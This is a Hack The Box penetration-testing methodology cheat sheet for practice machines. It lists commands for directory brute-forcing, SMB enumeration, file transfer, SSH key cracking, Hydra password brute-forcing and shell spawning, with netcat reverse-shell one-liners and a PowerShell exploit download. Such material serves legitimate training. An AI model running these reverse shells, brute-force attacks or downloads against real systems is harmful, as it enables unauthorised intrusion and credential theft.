WHAT IS HACK THE BOX ?
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
Many people asked me about the methodology I use to root machines in Hack The Box, so today I will explain in detail how I play Hack The Box machine.
PREPARATION
I create a separate dirctory for every single machine, so that I can save the files, tools and scripts I used in each box sepatately and note-down the important things like password, hash, custom scripts/payloads etc.
HOST FILE
sudo echo "10.10.10.XX machinename.htb" >> /etc/hosts
sudo nano /etc/hosts
Now you can use IP or URL in the commands or scripts as per your need.
WEB ENUMERATION / DIRECTORY AND FILES BRUTE-FORCING :
NIKTO :
if Port 80 or 443 is Open, you can use Nikto to collect more information.
https://github.com/sullo/nikto
nikto -h https://10.10.10.XX | tee nikto.txt
GOBUSTER :
https://github.com/OJ/gobuster
gobuster dir -u http://10.10.10.XX/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .txt,.html,.php -u http://10.10.10.XX:80/ -o gobuster.txt
FFUF :
https://github.com/ffuf/ffuf
ffuf -u http://10.10.10.XX:80/FUZZ/script.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee fuff.txt
WFUZZ :
https://github.com/xmendez/wfuzz
wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -u "http://10.10.10.XX/FUZZ.txt" -t 100 | tee wfuzz.txt
Use Seclists for More Wordlists : https://github.com/danielmiessler/SecLists
SERVICE ENUMERATION
EXPLOIT DB / SEARCHEXPLOIT :
https://exploit-db.com/searchsploit
sudo apt update && sudo apt -y install exploitdb
searchsploit -u
searchsploit -h
SMB ENUMERATION :
If you’re on a windows box and port 139 or 445 is open, Enumerate SMB.
nmblookup -A 10.10.10.XX
nbtscan 10.10.10.XX
smbmap -H 10.10.10.XX
smbclient -L 10.10.10.XX
nmap --script smb-os-discovery 10.10.10.XX
nmap -p445 -sV --script smb-enum-services 10.10.10.XX
nmap --script smb-enum-shares -p 139,445 10.10.10.XX
nmap --script smb-vuln* -p 139,445 10.10.10.XX
rpcclient -U "" -N 10.10.10.XX
ENUM4LINUX :
Enumerate information from Windows and Samba systems : https://kali.org/tools/enum4linux /
enum4linux -a -o 10.10.10.XX
FILE TRANSFER IN LINUX
PYTHON HTTP SERVER :
sudo python -m SimpleHTTPServer 80
wget http://[IP]/file.txt
NETCAT :
nc [IP/URL] [PORT] < filename
nc -l -p [PORT] > filename
BASE64 :
base64 file.txt
echo "aHR0cHM6Ly9oYWNrdHJvbmlhbi5pbgo=" | base64 -d > newfile.txt
SCP :
Transfer the file test.file to the other server use the following command :
FILE TRANSFER IN WINDOWS
HTTP SERVER :
Local System :
service apache2 start
cp exploit.exe /var/www/html/
Target System :
firefox http://10.10.10.XX/filename.xyz
(new-object System.Net.WebClient). DownloadFile('http://10.10.10.XX/ exploit.exe','C:\Users\ USERNAME\Desktop\ filename.xyz')
PSCP :
http://xray.rutgers.edu/~matilsky/documents/pscp.htm
Netcat
INSTALLATION :
sudo apt-get install netcat
wget http://bit.ly/netcat_exe -o nc.exe
LISTEN PORT :
nc -lnvp [PORT]
CHAT SERVER :
nc -l [PORT]
nc [IP] [PORT]
Now, type anything and it will show on the listener's shell.
FILE TRANSFER :
nc [IP/URL] [PORT] < filename
nc -l -p [PORT] > filename
REVERSE SHELL :
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.10.10.XX 1337
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.XX 1337 >/tmp/f
SSH
INSTALLATION :
sudo apt install openssh-server
CONNECTION :
CREATE SSH KEYS :
ssh-keygen
PERMISSION :
chmod 644 id_rsa.pub
chmod 600 id_rsa
SSH PASSWORD CRAKING USING KEY :
Download sshng2john.py
python /opt/JohnTheRipper/run/sshng2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
CRACK SSH PASSWORD USING HYDRA :
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.XX
SHELL SPAWNING
python -c 'import pty; pty.spawn("/bin/bash")'
echo 'os.system('/bin/bash')'
/bin/sh -i
/bin/bash -i
exec "/bin/sh";
exec "/bin/sh"
os.execute('/bin/sh')
exec "/bin/sh"
:!bash
:set shell=/bin/bash:shell
!sh
Interactive tty-shell : https://github.com/cornerpirate/socat-shell
More learning resources will be added soon...